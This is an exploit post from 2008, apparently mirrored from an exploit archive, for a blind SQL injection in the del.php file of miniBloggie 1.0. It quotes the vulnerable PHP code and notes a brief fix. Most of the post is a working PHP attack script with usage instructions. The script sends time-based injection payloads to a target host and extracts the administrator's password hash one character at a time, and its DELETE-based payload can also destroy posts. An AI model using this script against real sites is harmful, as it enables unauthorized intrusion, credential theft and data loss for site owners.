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miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit
来源:StAkeR[at]hotmail[dot]it 作者:StAkeR 发布时间:2008-10-20  
 StAkeR aka athos - StAkeR[at]hotmail[dot]it
   Date   -> 18/10/2008
   Get    -> http://www.mywebland.com/dl.php?id=2
   File del.php
   25. if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
   26. if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
   28. if ($confirm=="") {   
   29. notice("Confirmation", "Warning : Do you want to delete this post ? Yes");
   30. }
   31. elseif ($confirm=="yes") {
   32. // Data Base Connection  //
   33. dbConnect();
   34. $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
   35. $query = mysql_query($sql) or die("Cannot query the database.
" . mysql_error()); 36. $confirm =""; 37. notice("Del Post", "Data Deleted"); 38. } 39. else notice( "Delete Error, Unable to complete the task !" ); 40. ?> NOTE: $sql = "DELETE FROM blogdata WHERE post_id=$post_id"; $post_id isn't escaped so you can execute SQL Code How to fix? sanize $post_id with intval or int (PHP Functions) */ function get($host,$path,$evil) { if(!preg_match('/\w:[0-9]/i',$host)) alert(); $inet = explode(':',$host); if(!$sock = fsockopen($inet[0],$inet[1])) die('connection refused'); $data .= "GET /$path/del.php?post_id={$evil}&confirm=yes HTTP/1.1\r\n"; $data .= "Host: $host[0]\r\n"; $data .= "User-Agent: Lynx (textmode)\r\n"; $data .= "Connection: close\r\n\r\n"; fputs($sock,$data); while(!feof($sock)) { $html .= fgets($sock); } fclose($sock); return $html; } function alert() { echo "# miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n"; echo "# Usage: php {$argv[0]} [host:port] [path] [user_id]\r\n"; echo "# Usage: php {$argv[0]} localhost:80 /minibloggie 1\r\n"; die; } function charme($char,$colum,$id) { $sql = "1 or (select if((ascii(substring(password". ",$colum,1))=$char),benchmark(200000000,char(0)),0)". " from blogusername where id=$id)#"; return urlencode($sql); } $hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); $c = 0; for($i=0;$i<=32;$i++) { for($j=0;$j<=17;$j++) { $start = time(); get($argv[1],$argv[2],charme($hash[$j],$c,intval($argv[3]))); $stop = time(); if($stop - $start > 12) { $password .= chr($hash[$j]); $c++;; break; } } } if(isset($password)) { echo "# Hash: $password\r\n"; die; } else { echo "# Exploit Failed!\r\n"; } ?> # [2008-10-18]

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